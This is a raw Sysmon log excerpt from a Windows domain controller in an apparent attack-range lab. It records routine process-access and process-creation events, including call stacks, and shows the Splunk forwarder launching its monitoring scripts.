KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002169Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.793{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002168Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.793{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002167Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.793{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002166Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.793{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002165Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.793{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002164Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.793{5D479F2C-169F-5F84-0500-000000007F01}6482424C:\Windows\system32\csrss.exe{5D479F2C-16B6-5F84-6000-000000007F01}4044C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002163Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.793{5D479F2C-16B1-5F84-3000-000000007F01}26163792C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5D479F2C-16B6-5F84-6000-000000007F01}4044C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000002162Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.795{5D479F2C-16B6-5F84-6000-000000007F01}4044C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinPrintMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{5D479F2C-16B1-5F84-3000-000000007F01}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002161Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.683{5D479F2C-16B2-5F84-3A00-000000007F01}37963816C:\Windows\system32\conhost.exe{5D479F2C-16B6-5F84-5F00-000000007F01}3788C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002160Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.683{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002159Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.683{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002158Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.683{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002157Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.683{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002156Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.683{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002155Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.683{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002154Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.683{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002153Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.683{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002152Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.683{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002151Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.683{5D479F2C-169F-5F84-0500-000000007F01}6481156C:\Windows\system32\csrss.exe{5D479F2C-16B6-5F84-5F00-000000007F01}3788C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002150Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.683{5D479F2C-16B1-5F84-3000-000000007F01}26163792C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5D479F2C-16B6-5F84-5F00-000000007F01}3788C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000002149Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.686{5D479F2C-16B6-5F84-5F00-000000007F01}3788C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinNetMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{5D479F2C-16B1-5F84-3000-000000007F01}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002148Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.574{5D479F2C-16B2-5F84-3A00-000000007F01}37963816C:\Windows\system32\conhost.exe{5D479F2C-16B6-5F84-5E00-000000007F01}3604C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002147Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.574{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002146Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.574{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002145Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.574{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002144Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:26.574{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 